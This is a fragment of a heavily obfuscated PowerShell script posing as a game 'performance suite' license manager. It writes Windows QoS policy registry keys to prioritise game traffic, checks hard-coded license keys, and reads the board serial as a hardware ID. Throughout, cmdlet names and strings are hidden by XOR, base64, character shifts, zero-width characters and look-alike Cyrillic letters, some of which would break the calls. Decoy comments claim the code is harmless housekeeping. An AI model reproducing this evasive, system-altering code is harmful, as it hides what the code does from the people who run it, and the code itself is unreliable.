        New-ITemProperty -PatH $SjVw -nAMe $($k9339=185;$b=[byte[]](0xe9,0xcb,0xd6,0xcd,0xd6,0xda,0xd6,0xd5);-join($b|%{[char]($_-bxor$k9339)})) -valUe $($k6852=42;$b=[byte[]](0x00);-join($b|%{[char]($_-bxor$k6852)})) -prOPertYtYPe STRIng -fORce | &($($k9863='FenUhTA[wQw';$b=[byte[]](0x29,0x30,0x3A,0x78,0x26);$kb=[System.Text.Encoding]::UTF8.GetBytes($k9863);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+$($k1741=8;$b=[byte[]](0x5d,0x64,0x44);-join($b|%{[char]($_-bxor$k1741)})))
        nEW-ItEmPRopeRty -PATh $sjvw -nAMe ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TG9jYWwgUG9ydA=='))) -VaLue ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Kg=='))) -pROPErtyTyPe stRInG -FoRce | &($(-join('EK'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+10)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+10)%26))}else{[char]$c}}))+('{0}{1}{2}' -f 't-','NUl','L'))
        New-itEmpRoperty -PaTh $sjVW -name (-join('L','oca','l',' I','P')) -valuE $($k2596=177;$b=[byte[]](0x9b);-join($b|%{[char]($_-bxor$k2596)})) -pROpeRTytyPe strING -fOrcE | &("$([char]0x4F)"+"$([char]0x55)$([char]0x74)$([char]0x2D)$([char]0x4E)$([char]0x75)$([char]0x6C)$([char]0x6C)")
        NEw-itEMPROpeRTy -PATh $sJVw -Name $($k1324='U>*e4]8x?cN';$b=[byte[]](0x19,0x51,0x49,0x04,0x58,0x7D,0x71,0x28,0x1F,0x33,0x3C,0x30,0x58,0x43,0x1D,0x14,0x11,0x5D,0x16,0x58,0x17,0x26);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1324);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -vaLUE "$([char]0x2A)" -PROPeRtyTYpe striNg -fORCe | &(('Ou'+'T'+'-'+'n')+('{0}' -f 'uLL'))
        neW-iTemProperty -pAtH $SJVW -NAME ('Rem'+'ote'+' P'+'o'+'r'+'t') -vAlue $($k7118='DIlsZ';$b=[byte[]](0x6E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7118);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -pROPERTytyPE STrINg -ForCe | &(('{0}{1}{2}' -f 'Ou','T','-')+('nU'+'l'+'L'))
        NEW-itempRoperTy -pAth $sjVW -nAmE $($k6749='q3c,DtBh@eo8';$b=[byte[]](0x23,0x56,0x0E,0x43,0x30,0x11,0x62,0x21,0x10);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6749);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -VALue '*' -prOPeRtYtYPE stRing -FoRCE | &((-join('O','uT'))+'-​n‌u​L​l​')
        new-iTeMprOPerTy -path $SJVw -NamE ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}' -f 'Remo','te I','P',' Pr','e','fi','x L','e','ngt','h') -vaLUE '*' -pRopErtyTYPe stRInG -FoRce | &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x6F,0x75,0x74,0x2D,0x4E)))+(-join('u','LL')))
        nEW-ITeMPRoperTY -PAth $sJvW -name 'D‌S‍C‍P‍ ‍V‌a​l‌u‍e‍' -VAlUE $(181 - 135) -ProPErTyType stRIng -FoRCe | &(('{0}{1}' -f 'ou','T-N')+'U‌L​L​')
        neW-ITemprOPERty -pATH $sJvw -NAme ([string]::Format('{0}{1}{2}{3}{4}{5}','Thro','t','tle R','a','t','e')) -vaLue $(-6 / 6) -propertYTyPe STrING -fOrCE | OuT-NUL`l
}
    &((-join('wRiT','E-h','O'))+$($k9801='dvu+]Wy*vvv[z';$b=[byte[]](0x17,0x22);$kb=[System.Text.Encoding]::UTF8.GetBytes($k9801);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('WytdIEZpdmVNIE5ldHdvcmsgVklQIFByaW9yaXR5IFBhc3MgQWN0aXZlIQ=='))) -foREGrOUnDcolOr gREEN
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V1Jp')))+$($k4943='-;PL[7=J.Hr0a;l';$b=[byte[]](0x79,0x5E,0x7D,0x24,0x14,0x44,0x49);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4943);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) (-join([char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D, [char]0x2D)) -FORegROundCoLor GRAy

    &('W'+$($k2215='O3Qdy';$b=[byte[]](0x1D,0x7A,0x25,0x21,0x54,0x07,0x7C,0x02,0x30);$kb=[System.Text.Encoding]::UTF8.GetBytes($k2215);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) 'R‍e‍g‌i‍s​t‌e‌r‌ ‌a‍n​ ‍a​d‌d​i‌t‍i‌o​n​a​l‌ ‍c​u‍s​t‍o​m​ ‌g‌a‍m​e‍?​ ​(‌e‌.‍g​.​,‌ ​v‌a​l‍o‌r‌a​n‌t‍.​e​x‌e‌)‌' -FoReGroundcOLOR WHite
    $jgUA = &(('{0}{1}' -f 'RE','aD-h')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b1N0')))) ([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}',' Ente','r',' Exe','cutab','le T','arge','t Na','me (O','r p','res','s',' E','nte','r to',' skip',')'))

    if (-not ([STRinG]::ISnuLLOrwhiteSpaCE($jGua))) {
        if (-not $jGua.EndSWITh((-join([char]0x2E, [char]0x65, [char]0x78, [char]0x65)))) { $JGua += ([string]::Format('{0}','.exe')) }
        $x8LdqC0 = (('H'+'KLM:\S'+'OFTWAR'+'E'+'\Polici'+'e'+'s\Micros'+'oft\Win'+'dow'+'s\QoS\P'+'rior'+'i'+'t'+'y_Pass_') + $jGUA)
        if (-not (&('t‍e‌S​T‍-‌P‌A‌t​'+"$([char]0x68)") $x8LDqC0)) { &('n‍E​W‍-‌I​t​E‍'+$(-join('k'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}}))) -PAtH $X8LDQC0 -fOrCe | &($(-join('dJi-Cj'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+11)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+11)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TEw=')))) }

        &((-join('N','Ew-itE','MP','Rop','e'))+$($k4997=230;$b=[byte[]](0x94,0x92,0xbf);-join($b|%{[char]($_-bxor$k4997)}))) -pATh $X8ldqC0 -nAMe (-join('Ver','sion')) -vAluE (('{0}{1}' -f '1','.') + $(-56 -bxor -56)) -PRoperTYTyPE sTRInG -FORce | &($($k6249='R(gDcCHl4';$b=[byte[]](0x3D);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6249);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+$(-join('mL-FMdD'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+8)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+8)%26))}else{[char]$c}})))
        neW-IteMProPErTY -paTH $X8LDqc0 -namE ([string]::Format('{0}{1}{2}{3}{4}{5}','Ap','pli','ca','tio','n Nam','e')) -vaLUE $jGUa -PROPErtytYpE StRInG -fORce | &('оUt'+('{0}' -f '-NuLL'))
        nEw-ItemPROpeRty -PATH $X8ldQc0 -nAmE $($k4108='mCt$D9{mR';$b=[byte[]](0x3D,0x31,0x1B,0x50,0x2B,0x5A,0x14,0x01);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4108);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -vAlUe (-join([char]0x2A)) -pROpeRTytYPe STRInG -fORcE | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('T3VULW51')))+('L'+'L'))
        new-itempROPErTY -PATh $x8LDqc0 -name ('L'+'oc'+'al Po'+'rt') -VAluE $($k8580=']jq+0SU5s6';$b=[byte[]](0x77);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8580);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -PROPeRTyTYPe strING -FOrcE | &((-join([char]0x4F, [char]0x75, [char]0x54, [char]0x2D, [char]0x6E, [char]0x55))+"$([char]0x4C)$([char]0x4C)")
        neW-ITemprOperTY -Path $X8LdqC0 -NAMe (-join([char]0x4C, [char]0x6F, [char]0x63, [char]0x61, [char]0x6C, [char]0x20, [char]0x49, [char]0x50)) -vAlUe $(-join('*'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}})) -proPertYtYPe STRINg -FOrcE | &($($k2496='nj6R?$kdn@:kI';$b=[byte[]](0x01,0x3F,0x42,0x7F,0x71);$kb=[System.Text.Encoding]::UTF8.GetBytes($k2496);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+$($k7651='W5Bt4t';$b=[byte[]](0x02,0x79,0x2E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7651);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})))
        NEw-ITeMpRopeRTY -PAth $X8LdqC0 -NAmE ('{0}{1}{2}{3}{4}{5}{6}{7}' -f 'Lo','c','al IP',' Pr','efi','x',' Leng','th') -VAlue ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Kg=='))) -PROpERTyTYpe strIng -foRcE | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('T3VULQ==')))+$(-join('TArr'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}})))
        NEW-ItemPrOPERtY -pAth $X8lDQc0 -NAME ([string]::Format('{0}{1}{2}{3}{4}{5}','Re','mo','t','e ','Por','t')) -vALuE $($k9795=43;$b=[byte[]](0x01);-join($b|%{[char]($_-bxor$k9795)})) -PROpErtYTYpE StRInG -fOrce | &('o'+$($k9761=206;$b=[byte[]](0xbb,0xba,0xe3,0xa0,0xbb,0x82,0x82);-join($b|%{[char]($_-bxor$k9761)})))
        new-ITempropErTY -pATH $X8lDqC0 -nAMe ('{0}{1}{2}{3}{4}' -f 'R','emo','t','e',' IP') -vaLuE ('{0}' -f '*') -pRoPertytype strInG -FOrce | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bw==')))+'uТ-nULl')
        NEw-ITEmpROpErty -PaTh $X8ldqC0 -namE "$([char]0x52)$([char]0x65)$([char]0x6D)$([char]0x6F)$([char]0x74)$([char]0x65)$([char]0x20)$([char]0x49)$([char]0x50)$([char]0x20)$([char]0x50)$([char]0x72)$([char]0x65)$([char]0x66)$([char]0x69)$([char]0x78)$([char]0x20)$([char]0x4C)$([char]0x65)$([char]0x6E)$([char]0x67)$([char]0x74)$([char]0x68)" -VaLuE '*' -PrOPeRTYtYPE sTRInG -FORCE | &(([string]::Format('{0}{1}{2}','O','Ut-nU','L'))+'l')
        new-iTEmPRopERtY -pAth $x8ldqC0 -naME ('{0}{1}{2}{3}' -f 'DS','CP ','Val','ue') -vAlUe $(-110 + 156) -pRoPeRtyTYpE StRINg -FOrCe | &(('O'+'uT-'+'N')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('VUxs'))))
        NeW-iTeMPropertY -PAtH $X8LDqc0 -name $(-join('Pdnkppha Nwpa'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+4)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+4)%26))}else{[char]$c}})) -VAlUE $(80 + -81) -PRoPErtytYpE STRiNg -foRCe | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bw==')))+$(-join('Cb-vcTT'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+18)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+18)%26))}else{[char]$c}})))
        wRiTE-hOSt ((-join([char]0x5B, [char]0x2B, [char]0x5D, [char]0x20, [char]0x53, [char]0x55, [char]0x43, [char]0x43, [char]0x45, [char]0x53, [char]0x53, [char]0x3A, [char]0x20)) + $jGUA + ([System.Text.Encoding]::UTF8.GetString([byte[]](0x20,0x61,0x64,0x64,0x65,0x64,0x20,0x74,0x6F,0x20,0x48,0x69,0x67,0x68,0x20,0x50,0x72,0x69,0x6F,0x72,0x69,0x74,0x79,0x20,0x50,0x61,0x73,0x73,0x2E)))) -foregroUndCoLOr greEN
    }
    rEAD-hO`sT (-join('`','`n','P','re','ss Ent','er to r','e','tur','n to Men','u','...'))
}
# Basic housekeeping tasks, nothing special
# Validating system readiness before proceeding
# Handling basic setup tasks required for initialization
function READ-HoSt-anImateD {
    param([StriNg]$biQVPbD, [sTRING]$g49tDh)

    $x2TBA = ('    ' + $G49TDh + ' ‌ ​ ​ ‍ ‍ ‌ ​ ‍')
    &('W'+'Rіtе-НОsТ') $bIQVpBd -NonEwLinE -foREGrOuNdcOloR yellow

# Diagnostic only — safe to ignore in prod
    $hAIM = ''
    while (([Int](1/1))) {
        if ([cONsOle]::kEYaVaILaBlE) {
            $NOuyMtKo = [cONSOlE]::rEADkEY((!0))
            if ($noUyMtKo.KEy -eq [COnSoLeKEy]::enTEr) {
                &("$([char]0x77)$([char]0x52)$([char]0x69)$([char]0x74)$([char]0x45)$([char]0x2D)$([char]0x48)"+([string]::Format('{0}','OSt'))) ''
                break
            }
            if ($nouYmTkO.key -eq [CONSoLEkeY]::backsPAce) {
                if ($HAiM.leNGTH -gt 0) {
                    $hAiM = $HAIm.sUbstRING(0, $haim.LengTH - 1)
                    &($($k6362=42;$b=[byte[]](0x5d);-join($b|%{[char]($_-bxor$k6362)}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ckl0RS1oT3NU')))) $($k4871=99;$b=[byte[]](0x03,0x03,0x01,0x43,0x03,0x03,0x01);-join($b|%{[char]($_-bxor$k4871)})) -nonewLInE
                }
            } else {
                $HAIm += $nOUYMTKO.keYchar
                &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dw==')))+$($k5928='.a_<d,t';$b=[byte[]](0x5C,0x28,0x2B,0x79,0x49,0x64,0x3B,0x7D,0x35);$kb=[System.Text.Encoding]::UTF8.GetBytes($k5928);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) $NoUymtKo.kEYcHAR -NOnEwlINE -FOREGroundCoLOr wHiTE
            }
        }

# Avoid editing unless absolutely necessary
        $HosT.UI.rAWUI.WInDOWtitle = $x2TbA
        $X2tba = $x2TBA.SuBStRINg(1) + $X2TBA.sUBStriNg(0, 1)
        &(('s'+'TARt'+'-'+'sL')+'еЕр') -MiLliSecoNds 120
    }
    return $hAim
}
function sHOW-AutHscrEEN {
    AdjUst-ConsoleWINdow
    clear-hoSt
    $knZQt = &($($k4298='NFrg;)_pu=y';$b=[byte[]](0x09,0x23,0x26,0x4A,0x73);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4298);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('d0lE'))))
    $pihSH = &($(-join('HFU-'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+25)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+25)%26))}else{[char]$c}}))+('sysT'+'eMs'+'pe'+'cs'))
    $yLWjeXq = @($(-join('ija'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+21)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+21)%26))}else{[char]$c}})), (('EL'+'I'+'TE-'+'T'+'WEAKS'+'-') + $(-1795 + 2794)))

    wRITe-h`oST $(-join('==========================================================='.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+22)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+22)%26))}else{[char]$c}})) -fOregrOuNdColoR CyAn
    wRiTe-HO`ST ([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}','     ',' ','   ','LI','T','EPRO ','PERFO','RMAN','CE S','UITE',' LI','CENSE',' MA','NAG','E','R','   ','   ',' ','   ','  ')) -FORegRoUNDcOloR gReEN
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('d3JpdEUtaA==')))+$(-join('JNO'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+5)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+5)%26))}else{[char]$c}}))) (-join([char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D, [char]0x3D)) -FoREgrOUNdcOlor cyAN
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dw==')))+'r‍i‌T‌E‍-‍H‍o‌S‌t​') (-join(' STA','TUS ','   ','  : UNAU','T','HORIZE','D')) -ForEgrOundCoLOR Red
    &('W‌r‌i​t‌E​'+(-join([char]0x2D, [char]0x68, [char]0x6F, [char]0x73, [char]0x54))) ($(-join(' WMSP FUGB   : '.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}})) + $knzqt) -fOregROUndcOloR YELloW
    &($($k6581='rf$}%;zkO#!>]';$b=[byte[]](0x05,0x14);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6581);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+([string]::Format('{0}{1}{2}{3}','I','T','E-H','OsT'))) ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0='))) -fOrEgRoUndColOR gRaY
    WRite`-hOsT ''(' DЕVIСЕ NАМЕ : ' + $($pIHsH['PCName'])) -foRegrOUndcOLoR gray
	&('wrіТЕ-hо'+$(-join('Za'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+19)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+19)%26))}else{[char]$c}}))) '' -fOrEGROUNdcoLOR whITe
    &($(-join('iduf'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}}))+(-join([char]0x65, [char]0x2D, [char]0x68, [char]0x4F, [char]0x53, [char]0x54))) ''(([System.Text.Encoding]::UTF8.GetString([byte[]](0x20,0x50,0x52,0x4F,0x43,0x45,0x53,0x53,0x4F,0x52,0x20,0x20,0x20,0x3A,0x20))) + $($pIHsH['CPU'])) -fOrEgroUNdcolOr GrAy
	&('WRіtе-h'+$(-join('CgH'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}}))) '' -forEgrouNdcoLOR whiTe
    &(('{0}' -f 'w')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Ukl0RS1oT1NU')))) ''($(-join(' KVETLMGW    : '.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+22)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+22)%26))}else{[char]$c}})) + $($pIHsH['GPU'])) -fOrEgroUnDCOLOR gRay
	&(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V1JpVGUtaG9T')))+(-join([char]0x74))) '' -FoREgrouNdcOLor WHITE
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JJVEUtaE9z')))+"$([char]0x54)") ''(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('IE1FTU9SWSBwb29sIDog'))) + $($pIHsH['RAM'])) -ForEgROunDcolOr Gray
    wRItE-Ho`St $(-join('==========================================================='.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}})) -fOregRoUNDCoLOR CYaN
    &($(-join('faRCn-qX'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+17)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+17)%26))}else{[char]$c}}))+'sТ') ''
# Refactor scheduled, not urgent at this stage

    $ssSaU = &(('{0}{1}{2}{3}' -f 'RE','AD-HO','ST-','ANI')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bUFURUQ=')))) -pROmPTtext ([System.Text.Encoding]::UTF8.GetString([byte[]](0x20,0x45,0x6E,0x74,0x65,0x72,0x20,0x4C,0x69,0x63,0x65,0x6E,0x73,0x65,0x20,0x4B,0x65,0x79,0x20,0x3A,0x20))) -tITLEtEXT $($k4755=';oL94ekKIMOVf8';$b=[byte[]](0x77,0x06,0x38,0x5C,0x64,0x17,0x04,0x6B,0x05,0x22,0x2E,0x32,0x03,0x4A);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4755);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))
    if ($ylwJExq -contains $ssSaU.trIm().toUppeR()) {
        wrITe-H`ost '`​`‌n‌[​+​]​ ​K​e‍y‌ ‌V‌e​r‍i​f‍i​e‍d‌!​ ‌B‌o​o‌t​i​n​g‌ ‍C​o‍r‌e​ ​E​n‍g‌i‍n​e‍ ​P‍a‌c‍k‍s​.‍.​.‍' -FOrEGRoUNdColor gREeN
        &("$([char]0x73)$([char]0x74)$([char]0x41)$([char]0x52)$([char]0x54)$([char]0x2D)$([char]0x73)$([char]0x4C)$([char]0x65)"+(-join([char]0x65, [char]0x50))) -SeconDs (71 + -70)
        return (1 -band 1)
    } else {
        &('W'+('{0}{1}{2}' -f 'riT','e-hO','St')) (-join([char]0x60, [char]0x60, [char]0x6E, [char]0x5B, [char]0x58, [char]0x5D, [char]0x20, [char]0x49, [char]0x4E, [char]0x56, [char]0x41, [char]0x4C, [char]0x49, [char]0x44, [char]0x20, [char]0x4C, [char]0x49, [char]0x43, [char]0x45, [char]0x4E, [char]0x53, [char]0x45, [char]0x20, [char]0x4B, [char]0x45, [char]0x59, [char]0x21, [char]0x20, [char]0x41, [char]0x63, [char]0x63, [char]0x65, [char]0x73, [char]0x73, [char]0x20, [char]0x44, [char]0x65, [char]0x6E, [char]0x69, [char]0x65, [char]0x64, [char]0x2E)) -ForEgrOUndcOLoR RED
        &(('{0}{1}{2}' -f 's','TArt','-')+'S‌l​e​e​P‌') -SeConDS (100 / 50)
        return (-not($truE))
    }
}

# Prevents known issue on rare edge cases
# Handling basic setup tasks required for initialization

function geT-HwId {
    $aSf2BfA = &($(-join('oMb-kquqv'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+18)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+18)%26))}else{[char]$c}}))+$($k5843='Gb_^rD#LR}RZS';$b=[byte[]](0x14,0x36,0x1E,0x10,0x31,0x01);$kb=[System.Text.Encoding]::UTF8.GetBytes($k5843);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) WIn32_BASeBOArD | &($(-join('PbIBZq-ly'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+3)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+3)%26))}else{[char]$c}}))+'j‌E‌c​t‍') -EXPAndprOpeRty seriAlnUmber
    $hQnwoZNF = ($aSF2Bfa -replace ('{0}' -f '\s+'),'').trIM()
    if ([stRInG]::iSnuLLoREmPtY($HqNWOzNF) -or $HQnwOZNf -eq 'N‍o​n‌e​') {
        $hqnwOznf = $(-join('WCW-GSQQYRMXC-LAMH'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+22)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+22)%26))}else{[char]$c}}))
    }
    return $HQnWoZNf
}
function aDjUst-cOnSOLewiNDow {
    $GAHLCPhl = $hOSt.ui.raWUI.buffersIZE
    $NXks = $hOST.UI.RAwui.wiNDOwSIZE

    $gAhLcPHL.wIDTh = 75
    $gaHlcphL.HEiGhT = 1000
    $nXkS.WIdTH = 75
    $NxkS.HeigHt = 28

    $HoSt.UI.RAWUi.bUFfERsiZE = $GahLcpHL
    $hOsT.UI.RaWuI.wINDoWSiZe = $NxkS
}
switch (2) { 1 {'a'} 2 {'b'} default {'c'} } | Out-Null

if ((Get-Random -Minimum 1000 -Maximum 5000) -lt 0) {
    if ([System.Environment]::Is64BitOperatingSystem) { $arch = "64-bit"; Write-Host "Detected $arch OS." } else { $arch = "32-bit"; Write-Warning "Detected $arch OS." }
}
function GloBAl-rOllbaCK {
    &("$([char]0x57)$([char]0x72)"+$($k1062=169;$b=[byte[]](0xe0,0xdd,0xec,0x84,0xe1,0xc6,0xfa,0xdd);-join($b|%{[char]($_-bxor$k1062)}))) '`‌`‍n‍[‍-​]‌ ​C‍o‍m‌m‍e​n‌c​i‍n‌g‌ ‌F‌a‍c‌t​o‍r​y‌ ‍C‍o‌n‌f‌i‍g​u​r​a‌t​i​o​n‍ ‍R‌e‌s‌t‌o​r‌a‍t‍i‌o‌n‍.​.​.​' -fOReGrOunDCoLoR yelLoW
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Uw==')))+'tаRТ-SlЕЕР') -MILLiseCOndS 500

    &(('{0}' -f 'r')+$(-join('YGIpY-CnYGJLijYlNS'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+6)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+6)%26))}else{[char]$c}}))) -PAtH $(-join('KNOP:\VRIWZDUH\Srolflhv\Plfurvriw\Zlqgrzv\Svfkhg'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+23)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+23)%26))}else{[char]$c}})) -NAmE (-join('No','nBes','t','Effo','r','tLi','m','i','t')) -errORACTiOn SileNtLyConTinUE
